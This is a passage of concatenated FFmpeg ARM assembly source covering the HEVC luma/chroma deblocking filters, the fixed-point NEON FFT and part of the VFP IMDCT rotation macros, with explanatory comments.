vmov q2, q5
vtrn.s16 q5, q2
vshr.u64 q2, #32
vshl.u64 q5, #32
vshl.u64 q2, #32
vshr.u64 q5, #32
vorr q5, q2
vmov q2, q5
vshl.i16 q7, q4, #1 @ q7 = 2*tc (strong-filter clip range)
vtrn.32 q2, q5
vand q5, q2
vneg.s16 q6, q7 @ -2*tc
vmovn.i16 d4, q5
vmovn.i16 d4, q2 @ NOTE(review): overwrites the previous vmovn — kept verbatim, looks redundant
vmov r8, s8 @ r8 = packed strong-filter mask
and r9, r8, r7
cmp r9, #0
beq weakfilter_\@
@ -- strong filter: recompute p2..p0 / q0..q2 from 5-tap averages,
@    clipped to +/-2*tc, and merge under the strong mask (q5) --
vadd.i16 q2, q11, q12
vadd.i16 q4, q9, q8
vadd.i16 q1, q2, q10
vdup.16 d10, r9
vadd.i16 q0, q1, q9
vshl.i16 q4, #1
lsr r9, #16
vadd.i16 q1, q0
vrshr.s16 q3, q0, #2
vadd.i16 q1, q13
vadd.i16 q4, q0
vsub.i16 q3, q10
vrshr.s16 q1, #3
vrshr.s16 q4, #3
vmax.s16 q3, q6
vsub.i16 q1, q11
vsub.i16 q4, q9
vmin.s16 q3, q7
vmax.s16 q4, q6
vmax.s16 q1, q6
vadd.i16 q3, q10
vmin.s16 q4, q7
vmin.s16 q1, q7
vdup.16 d11, r9
vadd.i16 q4, q9
vadd.i16 q1, q11
vbit q9, q4, q5 @ p2'
vadd.i16 q4, q2, q13
vbit q11, q1, q5 @ p0'
vadd.i16 q0, q4, q14
vadd.i16 q2, q15, q14
vadd.i16 q4, q0
vshl.i16 q2, #1
vadd.i16 q4, q10
vbit q10, q3, q5 @ p1'
vrshr.s16 q4, #3
vadd.i16 q2, q0
vrshr.s16 q3, q0, #2
vsub.i16 q4, q12
vrshr.s16 q2, #3
vsub.i16 q3, q13
vmax.s16 q4, q6
vsub.i16 q2, q14
vmax.s16 q3, q6
vmin.s16 q4, q7
vmax.s16 q2, q6
vmin.s16 q3, q7
vadd.i16 q4, q12
vmin.s16 q2, q7
vadd.i16 q3, q13
vbit q12, q4, q5 @ q0'
vadd.i16 q2, q14
vbit q13, q3, q5 @ q1'
vbit q14, q2, q5 @ q2'
weakfilter_\@:
@ -- weak filter on segments that are on but not strong --
mvn r8, r8
and r9, r8, r7
cmp r9, #0
beq ready_\@
vdup.16 q4, r2 @ beta
vdup.16 d10, r9
lsr r9, #16
vmov q1, q4
vdup.16 d11, r9
vshr.s16 q1, #1
vsub.i16 q2, q12, q11
vadd.i16 q4, q1
vshl.s16 q0, q2, #3
vshr.s16 q4, #3 @ (beta + (beta>>1)) >> 3 side thresholds
vadd.i16 q2, q0
vsub.i16 q0, q13, q10
vsub.i16 q2, q0
vshl.i16 q0, q0, #1
vsub.i16 q2, q0 @ 9*(q0-p0) - 3*(q1-p1)
vshl.s16 q1, q7, 2 @ NOTE(review): immediate written without '#' — kept verbatim (gas accepts it)
vrshr.s16 q2, q2, #4 @ delta0 before tc clip
vadd.i16 q1, q7 @ 10*tc abort threshold
vabs.s16 q3, q2
vshr.s16 q6, q6, #1 @ -tc
vcgt.s16 q1, q1, q3 @ |delta0| < 10*tc ?
vand q5, q1
vshr.s16 q7, q7, #1 @ tc
vmax.s16 q2, q2, q6
vmin.s16 q2, q2, q7 @ delta0 clamped to [-tc, tc]
vshr.s16 q7, q7, #1 @ tc >> 1 for the side deltas
@ p1 adjustment (only where dp side threshold passes)
vrhadd.s16 q3, q9, q11
vneg.s16 q6, q7
vsub.s16 q3, q10
vdup.16 d2, r5
vhadd.s16 q3, q2
vdup.16 d3, r6
vmax.s16 q3, q3, q6
vcgt.s16 q1, q4, q1
vmin.s16 q3, q3, q7
vand q1, q5
vadd.i16 q3, q10
lsr r5, #16
lsr r6, #16
vbit q10, q3, q1 @ p1'
@ q1 adjustment (only where dq side threshold passes)
vrhadd.s16 q3, q14, q12
vdup.16 d2, r5
vsub.s16 q3, q13
vdup.16 d3, r6
vhsub.s16 q3, q2
vcgt.s16 q1, q4, q1
vmax.s16 q3, q3, q6
vand q1, q5
vmin.s16 q3, q3, q7
vadd.i16 q3, q13
vbit q13, q3, q1 @ q1'
vadd.i16 q0, q11, q2 @ p0 + delta0
vsub.i16 q4, q12, q2 @ q0 - delta0
vbit q11, q0, q5
vbit q12, q4, q5
ready_\@:
@ -- narrow all rows back to u8 with saturation --
vqmovun.s16 d16, q8
vqmovun.s16 d18, q9
vqmovun.s16 d20, q10
vqmovun.s16 d22, q11
vqmovun.s16 d24, q12
vqmovun.s16 d26, q13
vqmovun.s16 d28, q14
vqmovun.s16 d30, q15
.endm
@ Vertical-edge luma deblocking filter.
@   r0 = pixel at the edge, r1 = stride, r2 = beta, r3 = tc array ptr
@ Loads 8 rows of the 8 columns straddling the edge (4 left, 4 right),
@ transposes so each d register holds one column, runs the shared body,
@ transposes back and stores. If the body takes the "bypasswrite" exit
@ it returns through the epilogue of ff_hevc_h_loop_filter_luma_neon,
@ which restores the identical {r5-r11}/{d8-d15} stack frame.
function ff_hevc_v_loop_filter_luma_neon, export=1
hevc_loop_filter_luma_start
push {r5-r11}
vpush {d8-d15}
sub r0, #4 @ back up to column p3
vld1.8 {d16}, [r0], r1
vld1.8 {d18}, [r0], r1
vld1.8 {d20}, [r0], r1
vld1.8 {d22}, [r0], r1
vld1.8 {d24}, [r0], r1
vld1.8 {d26}, [r0], r1
vld1.8 {d28}, [r0], r1
vld1.8 {d30}, [r0], r1
sub r0, r0, r1, lsl #3 @ rewind 8 rows
transpose_8x8 d16, d18, d20, d22, d24, d26, d28, d30
hevc_loop_filter_luma_body
transpose_8x8 d16, d18, d20, d22, d24, d26, d28, d30
vst1.8 {d16}, [r0], r1
vst1.8 {d18}, [r0], r1
vst1.8 {d20}, [r0], r1
vst1.8 {d22}, [r0], r1
vst1.8 {d24}, [r0], r1
vst1.8 {d26}, [r0], r1
vst1.8 {d28}, [r0], r1
vst1.8 {d30}, [r0]
vpop {d8-d15}
pop {r5-r11}
bx lr
endfunc
@ Horizontal-edge luma deblocking filter.
@   r0 = pixel at the edge, r1 = stride, r2 = beta, r3 = tc array ptr
@ Loads rows p3..q3, runs the shared body, and stores only p2..q2
@ (p3/q3 are never modified by the filter). The "bypasswrite" label
@ is the shared no-filter exit also used by the vertical variant.
function ff_hevc_h_loop_filter_luma_neon, export=1
hevc_loop_filter_luma_start
push {r5-r11}
vpush {d8-d15}
sub r0, r0, r1, lsl #2 @ back up 4 rows to p3
vld1.8 {d16}, [r0], r1
vld1.8 {d18}, [r0], r1
vld1.8 {d20}, [r0], r1
vld1.8 {d22}, [r0], r1
vld1.8 {d24}, [r0], r1
vld1.8 {d26}, [r0], r1
vld1.8 {d28}, [r0], r1
vld1.8 {d30}, [r0], r1
sub r0, r0, r1, lsl #3
add r0, r1 @ point at p2 for the store-back
hevc_loop_filter_luma_body
vst1.8 {d18}, [r0], r1
vst1.8 {d20}, [r0], r1
vst1.8 {d22}, [r0], r1
vst1.8 {d24}, [r0], r1
vst1.8 {d26}, [r0], r1
vst1.8 {d28}, [r0]
bypasswrite: @ shared exit: restore frame, no pixels written
vpop {d8-d15}
pop {r5-r11}
bx lr
endfunc
@ Vertical-edge chroma deblocking filter.
@   r0 = pixel at the edge, r1 = stride, r2 = tc array ptr
@ Loads 8 rows of the 8 columns around the edge, transposes so the
@ body sees d18=p1, d2=p0, d4=q0, d19=q1, filters, transposes back
@ and stores all 8 columns (only p0/q0 actually change).
function ff_hevc_v_loop_filter_chroma_neon, export=1
hevc_loop_filter_chroma_start
sub r0, #4 @ back up 4 columns
vld1.8 {d16}, [r0], r1
vld1.8 {d17}, [r0], r1
vld1.8 {d18}, [r0], r1
vld1.8 {d2}, [r0], r1
vld1.8 {d4}, [r0], r1
vld1.8 {d19}, [r0], r1
vld1.8 {d20}, [r0], r1
vld1.8 {d21}, [r0], r1
sub r0, r0, r1, lsl #3 @ rewind 8 rows
transpose_8x8 d16, d17, d18, d2, d4, d19, d20, d21
hevc_loop_filter_chroma_body
transpose_8x8 d16, d17, d18, d2, d4, d19, d20, d21
vst1.8 {d16}, [r0], r1
vst1.8 {d17}, [r0], r1
vst1.8 {d18}, [r0], r1
vst1.8 {d2}, [r0], r1
vst1.8 {d4}, [r0], r1
vst1.8 {d19}, [r0], r1
vst1.8 {d20}, [r0], r1
vst1.8 {d21}, [r0]
bx lr
endfunc
@ Horizontal-edge chroma deblocking filter.
@   r0 = pixel at the edge, r1 = stride, r2 = tc array ptr
@ Loads rows p1,p0,q0,q1 and stores back only p0 (d2) and q0 (d4),
@ the two rows the chroma filter can modify.
function ff_hevc_h_loop_filter_chroma_neon, export=1
hevc_loop_filter_chroma_start
sub r0, r0, r1, lsl #1 @ back up 2 rows to p1
vld1.8 {d18}, [r0], r1 @ p1
vld1.8 {d2}, [r0], r1 @ p0
vld1.8 {d4}, [r0], r1 @ q0
vld1.8 {d19}, [r0] @ q1
sub r0, r0, r1, lsl #1 @ point back at p0
hevc_loop_filter_chroma_body
vst1.8 {d2}, [r0], r1 @ store filtered p0
vst1.8 {d4}, [r0] @ store filtered q0
bx lr
endfunc
@ ===========================================================================
@ ffmpeg-3.0.2/libavcodec/arm/fft_fixed_neon.S
@ (from repo Akagi201/ffmpeg-xcode)
@ ===========================================================================
/*
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ Butterfly step on two q registers of packed 16-bit complex values.
@ \d0/\d1 = data in/out, \r0/\r1 = scratch. Uses halving add/sub
@ (vhadd/vhsub) so each pass scales by 1/2, keeping the fixed-point
@ values in range.
.macro bflies d0, d1, r0, r1
vrev64.32 \r0, \d1 @ t5, t6, t1, t2
vhsub.s16 \r1, \d1, \r0 @ t1-t5, t2-t6, t5-t1, t6-t2
vhadd.s16 \r0, \d1, \r0 @ t1+t5, t2+t6, t5+t1, t6+t2
vext.16 \r1, \r1, \r1, #1 @ t2-t6, t5-t1, t6-t2, t1-t5
vtrn.32 \r0, \r1 @ t1+t5, t2+t6, t2-t6, t5-t1
@ t5, t6, t4, t3
vhsub.s16 \d1, \d0, \r0
vhadd.s16 \d0, \d0, \r0
.endm
@ Twiddle \d3 by the Q15 coefficients \c0/\c1 (complex multiply via
@ multiply-accumulate with the swapped-halves copy in \r0, narrowing
@ back to s16 with >>15), then apply a butterfly to \q0/\q1.
@ \w0/\w1 are 32-bit wide scratch q registers.
.macro transform01 q0, q1, d3, c0, c1, r0, w0, w1
vrev32.16 \r0, \d3
vmull.s16 \w0, \d3, \c0
vmlal.s16 \w0, \r0, \c1
vshrn.s32 \d3, \w0, #15 @ back to Q15 s16
bflies \q0, \q1, \w0, \w1
.endm
@ Like transform01 but twiddles two d registers (\d1 with \c0/\c1 and
@ \d3 with \c2/\c3) before the butterfly on \q0/\q1. \d0/\d2 name the
@ untouched partners of the pairs; \r0/\r1 and \w0/\w1 are scratch.
.macro transform2 d0, d1, d2, d3, q0, q1, c0, c1, c2, c3, \
r0, r1, w0, w1
vrev32.16 \r0, \d1
vrev32.16 \r1, \d3
vmull.s16 \w0, \d1, \c0
vmlal.s16 \w0, \r0, \c1
vmull.s16 \w1, \d3, \c2
vmlal.s16 \w1, \r1, \c3
vshrn.s32 \d1, \w0, #15
vshrn.s32 \d3, \w1, #15
bflies \q0, \q1, \w0, \w1
.endm
@ 4-point fixed FFT on the packed complex values in \d0/\d1,
@ \r0/\r1 scratch. Halving operations give the 1/2-per-pass scaling
@ of the fixed-point FFT. The vmov.i64/vbit pair merges the two
@ half-difference orderings needed for the +/-i twiddle.
.macro fft4 d0, d1, r0, r1
vhsub.s16 \r0, \d0, \d1 @ t3, t4, t8, t7
vhsub.s16 \r1, \d1, \d0
vhadd.s16 \d0, \d0, \d1 @ t1, t2, t6, t5
vmov.i64 \d1, #0xffff00000000
vbit \r0, \r1, \d1 @ select negated lane for t8
vrev64.16 \r1, \r0 @ t7, t8, t4, t3
vtrn.32 \r0, \r1 @ t3, t4, t7, t8
vtrn.32 \d0, \r0 @ t1, t2, t3, t4, t6, t5, t8, t7
vhsub.s16 \d1, \d0, \r0 @ r2, i2, r3, i1
vhadd.s16 \d0, \d0, \r0 @ r0, i0, r1, i3
.endm
@ 8-point fixed FFT: a 4-point FFT on the even half plus a twiddled
@ butterfly (transform01 with the sqrt(1/2) coefficients \c0/\c1)
@ combining in the odd half. \r0/\r1/\w0/\w1 are scratch.
.macro fft8 d0, d1, d2, d3, q0, q1, c0, c1, r0, r1, w0, w1
fft4 \d0, \d1, \r0, \r1
vtrn.32 \d0, \d1 @ z0, z2, z1, z3
vhadd.s16 \r0, \d2, \d3 @ t1, t2, t3, t4
vhsub.s16 \d3, \d2, \d3 @ z5, z7
vmov \d2, \r0
transform01 \q0, \q1, \d3, \c0, \c1, \r0, \w0, \w1
.endm
@ In-place 4-point fixed FFT. r0 = FFTComplex (int16) array.
function fft4_neon
vld1.16 {d0-d1}, [r0]
fft4 d0, d1, d2, d3
vst1.16 {d0-d1}, [r0]
bx lr
endfunc
@ In-place 8-point fixed FFT. r0 = FFTComplex (int16) array, 16-byte
@ aligned. Loads the sqrt(1/2) twiddle row from the coefs table.
function fft8_neon
vld1.16 {d0-d3}, [r0,:128]
movrel r1, coefs
vld1.16 {d30}, [r1,:64] @ {SQRT1_2, -SQRT1_2, -SQRT1_2, SQRT1_2}
vdup.16 d31, d30[0] @ all-lanes SQRT1_2
fft8 d0, d1, d2, d3, q0, q1, d31, d30, d20, d21, q8, q9
vtrn.32 d0, d1
vtrn.32 d2, d3
vst1.16 {d0-d3}, [r0,:128]
bx lr
endfunc
@ In-place 16-point fixed FFT: 8-point FFT on the even half, 4-point
@ FFTs on the odd quarters, then two twiddled combine passes using the
@ cos(pi/8)/cos(3pi/8) rows of the coefs table.
@ r0 = FFTComplex (int16) array, 16-byte aligned.
function fft16_neon
vld1.16 {d0-d3}, [r0,:128]!
vld1.16 {d4-d7}, [r0,:128]
movrel r1, coefs
sub r0, r0, #32 @ rewind to the start of the buffer
vld1.16 {d28-d31},[r1,:128]
vdup.16 d31, d28[0]
fft8 d0, d1, d2, d3, q0, q1, d31, d28, d20, d21, q8, q9
vswp d5, d6
fft4 q2, q3, q8, q9 @ two 4-point FFTs on the odd quarters
vswp d5, d6
vtrn.32 q0, q1 @ z0, z4, z2, z6, z1, z5, z3, z7
vtrn.32 q2, q3 @ z8, z12,z10,z14,z9, z13,z11,z15
vswp d1, d2
vdup.16 d31, d28[0]
transform01 q0, q2, d5, d31, d28, d20, q8, q9
vdup.16 d26, d29[0]
vdup.16 d27, d30[0]
transform2 d2, d6, d3, d7, q1, q3, d26, d30, d27, d29, \
d20, d21, q8, q9
vtrn.32 q0, q1
vtrn.32 q2, q3
vst1.16 {d0-d3}, [r0,:128]!
vst1.16 {d4-d7}, [r0,:128]
bx lr
endfunc
@ Fixed-point FFT combine pass shared by all def_fft sizes.
@   r0 = z (FFTComplex int16 array), r1 = twiddle table
@   (ff_cos_N_fixed, see def_fft), r2 = n4/2 pair count.
@ Processes 4 interleaved sub-blocks per iteration (stride r12 =
@ 8*r2 bytes); the first iteration uses a special-cased twiddle
@ (transform01), the loop body twiddles two pairs per step
@ (transform2) walking the table forwards (r1) and backwards (r3).
function fft_pass_neon
push {r4,lr}
movrel lr, coefs + 24 @ the {1,-1,-1,1} sign row
vld1.16 {d30}, [lr,:64]
lsl r12, r2, #3 @ sub-block stride in bytes
vmov d31, d30
add r3, r1, r2, lsl #2 @ end of twiddle table
mov lr, #-8 @ backwards-walk step
sub r3, r3, #2
mov r4, r0
vld1.16 {d27[]}, [r3,:16]
sub r3, r3, #6
@ first iteration: load 4 blocks, special-case the first twiddle
vld1.16 {q0}, [r4,:128], r12
vld1.16 {q1}, [r4,:128], r12
vld1.16 {q2}, [r4,:128], r12
vld1.16 {q3}, [r4,:128], r12
vld1.16 {d28}, [r1,:64]!
vld1.16 {d29}, [r3,:64], lr
vswp d1, d2
vswp d5, d6
vtrn.32 d0, d1
vtrn.32 d4, d5
vdup.16 d25, d28[1]
vmul.s16 d27, d27, d31 @ apply sign pattern to backward twiddle
transform01 q0, q2, d5, d25, d27, d20, q8, q9
b 2f
1:
mov r4, r0
vdup.16 d26, d29[0]
vld1.16 {q0}, [r4,:128], r12
vld1.16 {q1}, [r4,:128], r12
vld1.16 {q2}, [r4,:128], r12
vld1.16 {q3}, [r4,:128], r12
vld1.16 {d28}, [r1,:64]! @ forward twiddles
vld1.16 {d29}, [r3,:64], lr @ backward twiddles
vswp d1, d2
vswp d5, d6
vtrn.32 d0, d1
vtrn.32 d4, d5
vdup.16 d24, d28[0]
vdup.16 d25, d28[1]
vdup.16 d27, d29[3]
vmul.s16 q13, q13, q15 @ apply sign pattern
transform2 d0, d4, d1, d5, q0, q2, d24, d26, d25, d27, \
d16, d17, q9, q10
2:
vtrn.32 d2, d3
vtrn.32 d6, d7
vdup.16 d24, d28[2]
vdup.16 d26, d29[2]
vdup.16 d25, d28[3]
vdup.16 d27, d29[1]
vmul.s16 q13, q13, q15
transform2 d2, d6, d3, d7, q1, q3, d24, d26, d25, d27, \
d16, d17, q9, q10
@ undo the interleave and store the 4 blocks back
vtrn.32 d0, d1
vtrn.32 d2, d3
vtrn.32 d4, d5
vtrn.32 d6, d7
vswp d1, d2
vswp d5, d6
mov r4, r0
vst1.16 {q0}, [r4,:128], r12
vst1.16 {q1}, [r4,:128], r12
vst1.16 {q2}, [r4,:128], r12
vst1.16 {q3}, [r4,:128], r12
add r0, r0, #16 @ next group of 2 complex pairs
subs r2, r2, #2
bgt 1b
pop {r4,pc}
endfunc
/* Q15 fixed-point twiddle constants: sqrt(1/2), cos(pi/8), cos(3pi/8). */
#define F_SQRT1_2 23170
#define F_COS_16_1 30274
#define F_COS_16_3 12540
@ Each row is a sign pattern {+,-,-,+} of one constant; the last row
@ is the bare sign pattern used by fft_pass_neon for backward twiddles.
const coefs, align=4
.short F_SQRT1_2, -F_SQRT1_2, -F_SQRT1_2, F_SQRT1_2
.short F_COS_16_1,-F_COS_16_1,-F_COS_16_1, F_COS_16_1
.short F_COS_16_3,-F_COS_16_3,-F_COS_16_3, F_COS_16_3
.short 1, -1, -1, 1
endconst
@ Define fft<n>_neon recursively: an n/2 FFT on the first half, two
@ n/4 FFTs on the quarters, then the shared combine pass with the
@ ff_cos_<n>_fixed twiddle table (2 bytes per int16 complex element,
@ hence the #\n4*2*4 / #\n4*3*4 byte offsets).
.macro def_fft n, n2, n4
function fft\n\()_neon
push {r4, lr}
mov r4, r0
bl fft\n2\()_neon
add r0, r4, #\n4*2*4
bl fft\n4\()_neon
add r0, r4, #\n4*3*4
bl fft\n4\()_neon
mov r0, r4
pop {r4, lr}
movrelx r1, X(ff_cos_\n\()_fixed)
mov r2, #\n4/2
b fft_pass_neon @ tail call; returns to our caller
endfunc
.endm
@ Instantiate fft32_neon .. fft65536_neon from the recursive template.
def_fft 32, 16, 8
def_fft 64, 32, 16
def_fft 128, 64, 32
def_fft 256, 128, 64
def_fft 512, 256, 128
def_fft 1024, 512, 256
def_fft 2048, 1024, 512
def_fft 4096, 2048, 1024
def_fft 8192, 4096, 2048
def_fft 16384, 8192, 4096
def_fft 32768, 16384, 8192
def_fft 65536, 32768, 16384
@ Entry point: dispatch to the fft<2^nbits>_neon routine.
@   r0 = FFTContext (first word is nbits), r1 = z buffer
@ The table is indexed by nbits-2 (smallest size is fft4).
function ff_fft_fixed_calc_neon, export=1
ldr r2, [r0] @ nbits
sub r2, r2, #2
movrel r3, fft_fixed_tab_neon
ldr r3, [r3, r2, lsl #2]
mov r0, r1 @ the fft routines take z in r0
bx r3
endfunc
@ Dispatch table for ff_fft_fixed_calc_neon, indexed by nbits-2.
const fft_fixed_tab_neon, relocate=1
.word fft4_neon
.word fft8_neon
.word fft16_neon
.word fft32_neon
.word fft64_neon
.word fft128_neon
.word fft256_neon
.word fft512_neon
.word fft1024_neon
.word fft2048_neon
.word fft4096_neon
.word fft8192_neon
.word fft16384_neon
.word fft32768_neon
.word fft65536_neon
endconst
@ ===========================================================================
@ ffmpeg-3.0.2/libavcodec/arm/mdct_vfp.S
@ (from repo Akagi201/ffmpeg-xcode)
@ ===========================================================================
/*
* Copyright (c) 2013 RISC OS Open Ltd
* Author: Ben Avison <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ Register aliases for the VFP IMDCT (pre-UAL APCS names: a1=r0..a4=r3,
@ v1=r4..v6=r9, ip=r12). Some aliases intentionally reuse a register
@ once its first role is dead: J0 reuses a2 (ORIGOUT), REVTAB_HI
@ reuses v5 (OLDFPSCR), and IN_HI/OUT_HI share v6.
CONTEXT .req a1
ORIGOUT .req a2
IN .req a3
OUT .req v1
REVTAB .req v2
TCOS .req v3
TSIN .req v4
OLDFPSCR .req v5
J0 .req a2
J1 .req a4
J2 .req ip
J3 .req lr
REVTAB_HI .req v5
IN_HI .req v6
OUT_HI .req v6
TCOS_HI .req sl
TSIN_HI .req fp
@ IMDCT pre-rotation, fully-unrolled variant (used for the fixed n=64
@ path). Each expansion handles 2 twiddles from the low end (index k)
@ and 2 from the high end (n4-k-2) of the tcos/tsin tables, using VFP
@ short-vector mode (length 4, set up by the caller's FPSCR write),
@ and scatters the 4 rotated complex results through revtab into OUT.
.macro prerotation_innerloop
.set trig_lo, k
.set trig_hi, n4 - k - 2
.set in_lo, trig_lo * 2
.set in_hi, trig_hi * 2
vldr d8, [TCOS, #trig_lo*4] @ s16,s17
vldr d9, [TCOS, #trig_hi*4] @ s18,s19
vldr s0, [IN, #in_hi*4 + 12]
vldr s1, [IN, #in_hi*4 + 4]
vldr s2, [IN, #in_lo*4 + 12]
vldr s3, [IN, #in_lo*4 + 4]
vmul.f s8, s0, s16 @ vector operation
vldr d10, [TSIN, #trig_lo*4] @ s20,s21
vldr d11, [TSIN, #trig_hi*4] @ s22,s23
vldr s4, [IN, #in_lo*4]
vldr s5, [IN, #in_lo*4 + 8]
vldr s6, [IN, #in_hi*4]
vldr s7, [IN, #in_hi*4 + 8]
ldr J0, [REVTAB, #trig_lo*2] @ two packed revtab halfwords
vmul.f s12, s0, s20 @ vector operation
ldr J2, [REVTAB, #trig_hi*2]
mov J1, J0, lsr #16
and J0, J0, #255 @ halfword value will be < n4
vmls.f s8, s4, s20 @ vector operation
mov J3, J2, lsr #16
and J2, J2, #255 @ halfword value will be < n4
add J0, OUT, J0, lsl #3 @ scale indices to complex (8-byte) slots
vmla.f s12, s4, s16 @ vector operation
add J1, OUT, J1, lsl #3
add J2, OUT, J2, lsl #3
add J3, OUT, J3, lsl #3
vstr s8, [J0] @ scatter real parts
vstr s9, [J1]
vstr s10, [J2]
vstr s11, [J3]
vstr s12, [J0, #4] @ scatter imaginary parts
vstr s13, [J1, #4]
vstr s14, [J2, #4]
vstr s15, [J3, #4]
.set k, k + 2
.endm
@ IMDCT pre-rotation, rolled variant for arbitrary sizes. Same math as
@ prerotation_innerloop, but walks IN/TCOS/TSIN/REVTAB forwards and the
@ *_HI pointers backwards with post-updates instead of compile-time
@ offsets; the loop terminates when IN meets IN_HI (see caller).
.macro prerotation_innerloop_rolled
vldmia TCOS!, {s16,s17}
vldmdb TCOS_HI!, {s18,s19}
vldr s0, [IN_HI, #-4]
vldr s1, [IN_HI, #-12]
vldr s2, [IN, #12]
vldr s3, [IN, #4]
vmul.f s8, s0, s16 @ vector operation
vldmia TSIN!, {s20,s21}
vldmdb TSIN_HI!, {s22,s23}
vldr s4, [IN]
vldr s5, [IN, #8]
vldr s6, [IN_HI, #-16]
vldr s7, [IN_HI, #-8]
vmul.f s12, s0, s20 @ vector operation
add IN, IN, #16
sub IN_HI, IN_HI, #16
ldrh J0, [REVTAB], #2
ldrh J1, [REVTAB], #2
vmls.f s8, s4, s20 @ vector operation
ldrh J3, [REVTAB_HI, #-2]!
ldrh J2, [REVTAB_HI, #-2]!
add J0, OUT, J0, lsl #3 @ scale indices to complex (8-byte) slots
vmla.f s12, s4, s16 @ vector operation
add J1, OUT, J1, lsl #3
add J2, OUT, J2, lsl #3
add J3, OUT, J3, lsl #3
vstr s8, [J0] @ scatter real parts
vstr s9, [J1]
vstr s10, [J2]
vstr s11, [J3]
vstr s12, [J0, #4] @ scatter imaginary parts
vstr s13, [J1, #4]
vstr s14, [J2, #4]
vstr s15, [J3, #4]
.endm
@ IMDCT post-rotation, unrolled variant, software-pipelined: one
@ expansion can retire the previous iteration's stores (\tail) while
@ issuing the next iteration's loads/multiplies (\head). Works inwards
@ and outwards from the middle of OUT (indices n8-k-2 and n8+k).
@ TCOS registers double-buffer between d10/d11 and d12/d13 depending
@ on the parity of k so head and tail never collide.
.macro postrotation_innerloop tail, head
.set trig_lo_head, n8 - k - 2
.set trig_hi_head, n8 + k
.set out_lo_head, trig_lo_head * 2
.set out_hi_head, trig_hi_head * 2
.set trig_lo_tail, n8 - (k - 2) - 2
.set trig_hi_tail, n8 + (k - 2)
.set out_lo_tail, trig_lo_tail * 2
.set out_hi_tail, trig_hi_tail * 2
.if (k & 2) == 0
TCOS_D0_HEAD .req d10 @ s20,s21
TCOS_D1_HEAD .req d11 @ s22,s23
TCOS_S0_TAIL .req s24
.else
TCOS_D0_HEAD .req d12 @ s24,s25
TCOS_D1_HEAD .req d13 @ s26,s27
TCOS_S0_TAIL .req s20
.endif
.ifnc "\tail",""
vmls.f s8, s0, TCOS_S0_TAIL @ vector operation
.endif
.ifnc "\head",""
vldr d8, [TSIN, #trig_lo_head*4] @ s16,s17
vldr d9, [TSIN, #trig_hi_head*4] @ s18,s19
vldr TCOS_D0_HEAD, [TCOS, #trig_lo_head*4]
.endif
.ifnc "\tail",""
vmla.f s12, s4, TCOS_S0_TAIL @ vector operation
.endif
.ifnc "\head",""
vldr s0, [OUT, #out_lo_head*4]
vldr s1, [OUT, #out_lo_head*4 + 8]
vldr s2, [OUT, #out_hi_head*4]
vldr s3, [OUT, #out_hi_head*4 + 8]
vldr s4, [OUT, #out_lo_head*4 + 4]
vldr s5, [OUT, #out_lo_head*4 + 12]
vldr s6, [OUT, #out_hi_head*4 + 4]
vldr s7, [OUT, #out_hi_head*4 + 12]
.endif
.ifnc "\tail",""
vstr s8, [OUT, #out_lo_tail*4]
vstr s9, [OUT, #out_lo_tail*4 + 8]
vstr s10, [OUT, #out_hi_tail*4]
vstr s11, [OUT, #out_hi_tail*4 + 8]
.endif
.ifnc "\head",""
vmul.f s8, s4, s16 @ vector operation
.endif
.ifnc "\tail",""
vstr s12, [OUT, #out_hi_tail*4 + 12]
vstr s13, [OUT, #out_hi_tail*4 + 4]
vstr s14, [OUT, #out_lo_tail*4 + 12]
vstr s15, [OUT, #out_lo_tail*4 + 4]
.endif
.ifnc "\head",""
vmul.f s12, s0, s16 @ vector operation
vldr TCOS_D1_HEAD, [TCOS, #trig_hi_head*4]
.endif
.unreq TCOS_D0_HEAD
.unreq TCOS_D1_HEAD
.unreq TCOS_S0_TAIL
.ifnc "\head",""
.set k, k + 2
.endif
.endm
@ IMDCT post-rotation, rolled + pipelined variant for arbitrary sizes.
@ Same head/tail software pipelining as postrotation_innerloop, but the
@ double-buffered TCOS registers and the OUT offsets are passed in as
@ macro arguments, and the table pointers walk with vldmia/vldmdb.
.macro postrotation_innerloop_rolled tail, head, tcos_s0_head, tcos_s1_head, tcos_s2_head, tcos_s3_head, tcos_s0_tail, out_offset_head, out_offset_tail
.ifnc "\tail",""
vmls.f s8, s0, \tcos_s0_tail @ vector operation
.endif
.ifnc "\head",""
vldmia TSIN!, {s16,s17}
vldmdb TSIN_HI!, {s18,s19}
vldmia TCOS!, {\tcos_s0_head,\tcos_s1_head}
.endif
.ifnc "\tail",""
vmla.f s12, s4, \tcos_s0_tail @ vector operation
.endif
.ifnc "\head",""
vldr s0, [OUT, #+\out_offset_head+0]
vldr s1, [OUT, #+\out_offset_head+8]
vldr s2, [OUT_HI, #-\out_offset_head-16]
vldr s3, [OUT_HI, #-\out_offset_head-8]
vldr s4, [OUT, #+\out_offset_head+4]
vldr s5, [OUT, #+\out_offset_head+12]
vldr s6, [OUT_HI, #-\out_offset_head-12]
vldr s7, [OUT_HI, #-\out_offset_head-4]
.endif
.ifnc "\tail",""
vstr s8, [OUT, #+\out_offset_tail+0]
vstr s9, [OUT, #+\out_offset_tail+8]
vstr s10, [OUT_HI, #-\out_offset_tail-16]
vstr s11, [OUT_HI, #-\out_offset_tail-8]
.endif
.ifnc "\head",""
vmul.f s8, s4, s16 @ vector operation
.endif
.ifnc "\tail",""
